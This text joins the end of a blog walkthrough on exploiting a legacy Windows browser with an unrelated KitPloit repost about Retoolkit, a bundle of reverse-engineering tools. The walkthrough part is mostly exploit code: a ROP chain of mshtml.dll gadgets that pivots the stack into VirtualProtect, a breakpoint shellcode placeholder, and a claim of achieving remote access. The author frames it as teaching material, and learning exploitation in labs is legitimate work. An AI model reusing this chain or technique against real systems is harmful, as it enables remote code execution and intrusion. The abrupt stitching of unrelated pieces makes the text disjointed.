rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is decremented, we can see that it now contains the VirtualProtect stack address. This is then moved into EAX, which is then exchanged with ESP to load the function call into ESP! Then, the ret part of the gadget takes the value at ESP, which is VirtualProtect, loads it into EIP, and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long-winded blog post. It has been a bit disheartening to see the lack of beginning-to-end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping out those who want to get into it but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

☑ ★ ✇ KitPloit - PenTest & Hacking Tools

Retoolkit - Reverse Engineer's Toolkit

By: Zion3R


This is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder on your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribute the software, please file a request here.


